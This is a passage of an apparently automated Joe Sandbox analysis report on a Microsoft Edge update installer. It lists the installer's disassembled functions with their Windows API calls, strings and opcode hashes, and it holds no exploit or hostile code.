                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 79cee1c78aee23bf02c4d0b0f198180dfc9470fd31027a3e6bcf6a5a4f09e92c
                                        • Instruction ID: 512f9db0458c6b1f2c18ed6ea47d0943d2377e68a09878fb0e958d2b53af0dfb
                                        • Opcode Fuzzy Hash: 79cee1c78aee23bf02c4d0b0f198180dfc9470fd31027a3e6bcf6a5a4f09e92c
                                        • Instruction Fuzzy Hash: 99F01272905340EB8725EBA8F8CAC5673F9AB18710B684919F058DB941E734FFD04BD5
                                        Function 001642E8 Relevance: 7.5, APIs: 5, Instructions: 24synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReleaseMutex.KERNEL32(?,?,0016332D,?,?,00000000), ref: 001642F4
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000000), ref: 00164308
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00164311
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0016431E
                                        • CloseHandle.KERNEL32(?,?,0016332D,?,?,00000000), ref: 00164331
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CloseHandle$MutexObjectReleaseSingleWait
                                        • String ID:
                                        • API String ID: 4138468388-0
                                        • Opcode ID: b00c2b37fe8a04a3c7bb05372bd2a560f24737be8656e07311f794fcb69a473f
                                        • Instruction ID: 2c2447d4a8212ecbd0bc714dd15075aca495545fa61f94f4747d87e0456bc723
                                        • Opcode Fuzzy Hash: b00c2b37fe8a04a3c7bb05372bd2a560f24737be8656e07311f794fcb69a473f
                                        • Instruction Fuzzy Hash: 25F04D31010B10DFD7365F25EC08B56BBB1BB14317F548A2DA09A949B2C7B5A9E8DE84
                                        Function 001629D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,?,?,00000000,?), ref: 00162A8A
                                        • lstrcmpiW.KERNEL32(00000000,MicrosoftEdgeUpdateSetup.exe,?), ref: 00162AF8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: BuffCharLowerlstrcmpi
                                        • String ID: .exe$MicrosoftEdgeUpdateSetup.exe
                                        • API String ID: 1713355025-738854581
                                        • Opcode ID: cd02bd1c8a87f0b092f8f388851bc1f694a013c6f50a2ba80e923d5006e4adaa
                                        • Instruction ID: 76fb7b7265c00c486d1529c300d0c136951645806d96bbefd2ef008ebfade18e
                                        • Opcode Fuzzy Hash: cd02bd1c8a87f0b092f8f388851bc1f694a013c6f50a2ba80e923d5006e4adaa
                                        • Instruction Fuzzy Hash: 1E41D572900509AFDB29EFA4CC95ABEB7B8FF20314F10455DE412A7582DB70AB55CB90
                                        Function 00161D96 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000,?,?,00000000), ref: 00161E3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: FileModuleName
                                        • String ID: "%s"$/%s$recover
                                        • API String ID: 514040917-4067204065
                                        • Opcode ID: 1e003816a15f1ddaccca598f51924ac146f432aa200db5e3bc7029d5ce02fc84
                                        • Instruction ID: daf3f418ba3e2193b72bdf5ced5269bfbc08216338248dcb3e7e713dfd05580d
                                        • Opcode Fuzzy Hash: 1e003816a15f1ddaccca598f51924ac146f432aa200db5e3bc7029d5ce02fc84
                                        • Instruction Fuzzy Hash: F82199B594020877CB21E760DC8AFDAB3BCAF64310F1445A9F919D3182EFB59A94CB90
                                        Function 0016A144 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: a78ea8add4e563e6583ab107319cef613b987f098824056aa543e77e6aaf9735
                                        • Instruction ID: 3988b8561e00fac2aa89e6ac56bca003721006fb20361b2c30a6557c3c15b89d
                                        • Opcode Fuzzy Hash: a78ea8add4e563e6583ab107319cef613b987f098824056aa543e77e6aaf9735
                                        • Instruction Fuzzy Hash: B25115726412029FDF299F54CC61BBA77A4FF14710F54412DE90267291E732EDA0CF92
                                        Function 0016EE4A Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0016F46C: _free.LIBCMT ref: 0016F47A
                                          • Part of subcall function 00170045: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,0017477D,0000FDE9,00000000,?,?,?,001744F6,0000FDE9,00000000,?), ref: 001700F1
                                        • GetLastError.KERNEL32 ref: 0016EEB2
                                        • __dosmaperr.LIBCMT ref: 0016EEB9
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0016EEF8
                                        • __dosmaperr.LIBCMT ref: 0016EEFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                        • String ID:
                                        • API String ID: 167067550-0
                                        • Opcode ID: 2c3c69b34f8a2b955e9f8a223826e5203cdb40b9aeca69724b175d9d692c7ff0
                                        • Instruction ID: 4e73113af3c09d296d4c6ff059d78f3e3251bb19534630ab0d9362cbd10680c1
                                        • Opcode Fuzzy Hash: 2c3c69b34f8a2b955e9f8a223826e5203cdb40b9aeca69724b175d9d692c7ff0
                                        • Instruction Fuzzy Hash: C3210776604309AFDB20AF658C80D6BBBEDEF153A47118728F829D3541DB31EC618BA0
                                        Function 00165D11 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLengthSid.ADVAPI32(00166385,00000220,00000000,001833B4), ref: 00165D6F
                                          • Part of subcall function 00165FE0: GetSecurityDescriptorControl.ADVAPI32(00000000,?,?,00000000), ref: 0016600E
                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,00166389,00000220,00000000,001833B4,?,00166389,?,?,?,00000220,?,?,Global\EdgeUpdate,00000000), ref: 00165D45
                                          • Part of subcall function 0016540A: GetLastError.KERNEL32(00165668,?,00165503,?), ref: 0016540A
                                          • Part of subcall function 0016C27B: _free.LIBCMT ref: 0016C28E
                                        • CopySid.ADVAPI32(00166389,00000000,00166385), ref: 00165D91
                                        • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,00000000), ref: 00165DA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: DescriptorSecurity$Owner$ControlCopyErrorLastLength_free
                                        • String ID:
                                        • API String ID: 3244541157-0
                                        • Opcode ID: 19a67c1d02988015dc3bfdad5a206e880e3c4d09bd11ecf02878cd951599ba79
                                        • Instruction ID: 357f19eff5e87c2a36d55e95d36b4ebe4ceb7a2b59578f2574c36079b3a8054e
                                        • Opcode Fuzzy Hash: 19a67c1d02988015dc3bfdad5a206e880e3c4d09bd11ecf02878cd951599ba79
                                        • Instruction Fuzzy Hash: 8921DF31900A08EBDB14ABF5DC49BAFB7BEEF50755F10406EF406A6191DF3099A0DBA0
                                        Function 0016E809 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0016CA8A,?,?,?,?,0016C529,?), ref: 0016E80E
                                        • _free.LIBCMT ref: 0016E86B
                                        • _free.LIBCMT ref: 0016E8A1
                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0016CA8A,?,?,?,?,0016C529,?), ref: 0016E8AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ErrorLast_free
                                        • String ID:
                                        • API String ID: 2283115069-0
                                        • Opcode ID: a5247f439e0082a92ee7ab3c1f16614f31b924e8bd9e64ff29d9958f5459edbe
                                        • Instruction ID: f8b2c24647350e9c9b946935a91bd55eefd85c3da7ec80690199f40b98945bc4
                                        • Opcode Fuzzy Hash: a5247f439e0082a92ee7ab3c1f16614f31b924e8bd9e64ff29d9958f5459edbe
                                        • Instruction Fuzzy Hash: 4911E93A204600BAD61163BCAC8992F26EDABE1770B350734F525A71E2EF218D618254
                                        Function 00164408 Relevance: 6.1, APIs: 4, Instructions: 71fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 001644AE: UnmapViewOfFile.KERNEL32(?,?,00164425,001833C4,00000000,?,?,?,?,?,001617C6), ref: 001644BA
                                          • Part of subcall function 001644AE: CloseHandle.KERNEL32(?,?,00164425,001833C4,00000000,?,?,?,?,?,001617C6), ref: 001644CD
                                          • Part of subcall function 001644AE: CloseHandle.KERNEL32(?,?,00164425,001833C4,00000000,?,?,?,?,?,001617C6), ref: 001644E0
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,001833C4,00000000,?,?,?,?,?,001617C6), ref: 00164438
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,001617C6), ref: 0016444D
                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,001617C6), ref: 00164460
                                        • VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,?,?,001617C6), ref: 00164480
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleView$MappingQueryUnmapVirtual
                                        • String ID:
                                        • API String ID: 944214783-0
                                        • Opcode ID: a9dde22fa4dd251c00dbc78c493120edbe27ffe4a18e2d524dfbe224aff4ef06
                                        • Instruction ID: 2a82c75b84bb8ccba38f1168522aa5fe85fad9ec1b832dac742c8327c74770ce
                                        • Opcode Fuzzy Hash: a9dde22fa4dd251c00dbc78c493120edbe27ffe4a18e2d524dfbe224aff4ef06
                                        • Instruction Fuzzy Hash: CA11B274600345BBEB249F25DC4AFAB7B78EBC5B10F10842DB915AB281DF74D990D670
                                        Function 0016E960 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0016ECD8,0016ED69,?,?,0016BFBC), ref: 0016E965
                                        • _free.LIBCMT ref: 0016E9C2
                                        • _free.LIBCMT ref: 0016E9F8
                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0016ECD8,0016ED69,?,?,0016BFBC), ref: 0016EA03
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ErrorLast_free
                                        • String ID:
                                        • API String ID: 2283115069-0
                                        • Opcode ID: 271bd1b8d4cff2b6a98cab42b5a3851e6396e7f7f7c78f380b0152d03b0fae54
                                        • Instruction ID: a9805e622388c8d94085daea2f8b276a965f554da862d9feefd248363ec39c7c
                                        • Opcode Fuzzy Hash: 271bd1b8d4cff2b6a98cab42b5a3851e6396e7f7f7c78f380b0152d03b0fae54
                                        • Instruction Fuzzy Hash: 9A11DF3A204600BAD65177BD5C89E2F36F9AFE0778F350734F11A971E1EF618D614260
                                        Function 001615DC Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00161634
                                        • VerSetConditionMask.KERNEL32(00000000), ref: 0016163C
                                        • VerSetConditionMask.KERNEL32(00000000), ref: 00161644
                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0016166C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion
                                        • String ID:
                                        • API String ID: 2793162063-0
                                        • Opcode ID: ba1bcd4db70a267f0c7e154b74bf9fad82e29b1eda479cf1a9f93dae873008dc
                                        • Instruction ID: 86f1e116ff4fc201ce1c0663cfd2be103de37d4cac8c4c09204cbada75d86003
                                        • Opcode Fuzzy Hash: ba1bcd4db70a267f0c7e154b74bf9fad82e29b1eda479cf1a9f93dae873008dc
                                        • Instruction Fuzzy Hash: 6E1100B1A40218BAEB219F649C4ABDA7BBCEF48B00F404099F608A6181D7B44BC48FD4
                                        Function 00177547 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00176906,?,00000001,?,?,?,001741CC,?,?,?), ref: 0017755E
                                        • GetLastError.KERNEL32(?,00176906,?,00000001,?,?,?,001741CC,?,?,?,?,?,?,00174718,00000000), ref: 0017756A
                                          • Part of subcall function 00177530: CloseHandle.KERNEL32(FFFFFFFE,0017757A,?,00176906,?,00000001,?,?,?,001741CC,?,?,?,?,?), ref: 00177540
                                        • ___initconout.LIBCMT ref: 0017757A
                                          • Part of subcall function 001774F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00177520,001768F3,?,?,001741CC,?,?,?,?), ref: 00177504
                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00176906,?,00000001,?,?,?,001741CC,?,?,?,?), ref: 0017758F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                        • String ID:
                                        • API String ID: 2744216297-0
                                        • Opcode ID: 5c4241a9aac168ee87a7fdd3944de59ff4d79b10734f57cc063291b79b4cc930
                                        • Instruction ID: cd77ce454fbb7afc8b20549219e41395bc72cb787e3d2c18adcc489fc0c932e9
                                        • Opcode Fuzzy Hash: 5c4241a9aac168ee87a7fdd3944de59ff4d79b10734f57cc063291b79b4cc930
                                        • Instruction Fuzzy Hash: 7FF0C936504229BBCF222F95EC0899E3F76FF593A1F448424FA1D95571DB328DA09BD0
                                        Function 0017969E Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • SleepConditionVariableCS.KERNELBASE(?,0017963B,00000064), ref: 001796C1
                                        • LeaveCriticalSection.KERNEL32(00187388,00000000,?,0017963B,00000064,?,?,00161363,001873E8,00000000,?,001616A1), ref: 001796CB
                                        • WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,0017963B,00000064,?,?,00161363,001873E8,00000000,?,001616A1), ref: 001796DC
                                        • EnterCriticalSection.KERNEL32(00187388,?,0017963B,00000064,?,?,00161363,001873E8,00000000,?,001616A1), ref: 001796E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                        • String ID:
                                        • API String ID: 3269011525-0
                                        • Opcode ID: 08856a0752bdba95da569576db5a1925e5dc3c62ccf683021ce62e80f8ac9dca
                                        • Instruction ID: 582ac6a9cc249c14a9a1f5a05a0ff72b19c7bf04f707d80293d651b1f9061666
                                        • Opcode Fuzzy Hash: 08856a0752bdba95da569576db5a1925e5dc3c62ccf683021ce62e80f8ac9dca
                                        • Instruction Fuzzy Hash: 6BE09231544224FBC7012B80EC0999D7F34FB05751B204128FD0D625A087709A80ABC2
                                        Function 0016C120 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0016C129
                                          • Part of subcall function 0016ED43: HeapFree.KERNEL32(00000000,00000000,?,0016BFBC), ref: 0016ED59
                                          • Part of subcall function 0016ED43: GetLastError.KERNEL32(?,?,0016BFBC), ref: 0016ED6B
                                        • _free.LIBCMT ref: 0016C13C
                                        • _free.LIBCMT ref: 0016C14D
                                        • _free.LIBCMT ref: 0016C15E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 1acca273d43b9cb825ab0b56863e7279f862856288d69b9beec392396f1052ab
                                        • Instruction ID: e09d35785c5e0cd34c36a12b2066b9cf891050847727688fe098d26f1e245d00
                                        • Opcode Fuzzy Hash: 1acca273d43b9cb825ab0b56863e7279f862856288d69b9beec392396f1052ab
                                        • Instruction Fuzzy Hash: 24E0E67D425120DEC702AF58FC055893FA1F7787017550146FC1026A71D77247A1EF96
                                        Function 0016B2C7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                        • API String ID: 0-2543340943
                                        • Opcode ID: 4a5615beef423d82d4a732c4068a7b0024d7c40d1582297231ec53af943e4979
                                        • Instruction ID: fe3ecc93ad0a49eeb88e8579cc67db18128a2394f8fa34536a8768376e6b9d9c
                                        • Opcode Fuzzy Hash: 4a5615beef423d82d4a732c4068a7b0024d7c40d1582297231ec53af943e4979
                                        • Instruction Fuzzy Hash: E8416D75B04218AFCB25DF99DCC59AFBBF8FBA5310B14006AE405D7311E7B19AA1CB90
                                        Function 0016A75E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0016A783
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: EncodePointer
                                        • String ID: MOC$RCC
                                        • API String ID: 2118026453-2084237596
                                        • Opcode ID: 5edcddc0b68804118d8f9bc76d7ca11ed1dc419439c08673b5e92ae51dd2c6c5
                                        • Instruction ID: b1879352dcd262afd1f8357b3c3b7925e8fc777d33a06d288f893bbbf4d592f4
                                        • Opcode Fuzzy Hash: 5edcddc0b68804118d8f9bc76d7ca11ed1dc419439c08673b5e92ae51dd2c6c5
                                        • Instruction Fuzzy Hash: D5416772900209AFCF15CF98CD81AAEBBB9BF48301F1581A9F905B7261D335D961DF52
                                        Function 00163055 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0016307D
                                        • GetLastError.KERNEL32 ref: 001630F4
                                          • Part of subcall function 00164863: GetStartupInfoW.KERNEL32(?,?,00000000), ref: 001648A7
                                          • Part of subcall function 00164863: CreateProcessW.KERNEL32(00000000,00000010,00000000,00000000,00000000,00000400,00000000,00000000,?,?), ref: 001648E2
                                          • Part of subcall function 00164863: GetLastError.KERNEL32 ref: 001648F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
